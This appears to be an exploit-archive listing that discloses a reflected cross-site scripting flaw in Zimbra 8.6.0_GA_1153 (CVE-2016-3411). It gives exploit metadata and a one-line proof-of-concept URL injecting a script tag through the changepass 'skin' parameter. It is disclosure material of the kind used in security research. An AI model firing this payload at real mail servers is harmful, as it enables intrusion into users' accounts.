Zimbra 8.6.0_GA_1153 Cross Site Scripting

Zimbra version 8.6.0_GA_1153 build 20141215151110 suffers from a cross site scripting vulnerability.


MD5 | 0fea963435c71a68f27ddc33d319dfb7

# Exploit Title: Xss Zimbra Mail server
# Google Dork:
# Date: 2018/08/10
# Exploit Author: Dinbar78
# Vendor Homepage: https://www.zimbra.com/

# Version: 8.6.0_GA_1153 (build 20141215151110)
# bug 103609 or CVE-2016-3411


Payload: es.
https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>


Related Posts